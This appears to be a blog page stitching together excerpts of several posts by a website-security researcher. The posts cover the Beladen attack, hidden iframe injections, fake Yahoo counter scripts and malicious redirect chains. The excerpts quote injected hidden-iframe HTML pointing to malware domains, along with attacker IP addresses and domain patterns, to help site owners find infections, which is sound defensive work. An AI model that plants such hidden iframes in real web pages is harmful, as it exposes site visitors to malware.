There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as the Gumblar. To my mind, it’s because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it. Most likely the spread of this attack is underestimated.
In this post, I’ll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit where your 150+ comments made my article the most informative online resource about that attack that most other sites (including major media) referred to.
I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.
This is a quick post about yet another type of hidden iframes injected into legitimate web pages.
The HTML code may look like this:
<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.
The html code looks like this
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
This is a post about this week’s prevalent website infection. There are quite a few modifications but they all link to the same IP-address: 84 .244 .138 .55 and if Google detects the malicious scripts it blacklists infected sites reporting that “Malicious software is hosted on 1 domain(s), including 188.8.131.52/.”
I’ve seen two modification of the malicious script:
Fake Yahoo! counter script injection has been the most “popular” security problem for the last couple of week in the “Malware & hacked sites” section of the Google’s webmaster help forum.
This script is not a new exploit but it looks like we have a new surge that affects thousands of sites, so I decided to review it. Continue »»
In the previous post I talked about the exploit that redirected Googlebot to malicious sites. This time I’ll talk about how I investigated this issue and what I discovered.
This started about a week ago when I noticed a few sites with suspicious redirects in Unmask Parasites reports. There was a chain of two 301 redirects: -> “http://bablo .me .uk/” -> “http://www. 524045. secki .info/”. Sometimes “bablo me uk” redirected to other sites that always contained a random 6 digit number as a subdomain name. I decided to find out what was going on. Continue »»
Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/” followed with a site with a random 6 digit number as a sub-domain name (e.g. http://www. 524045. secki .info/).
I decided to follow the redirects and find out where they lead to. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. Now let’s talk about the things web masters should know about this exploit.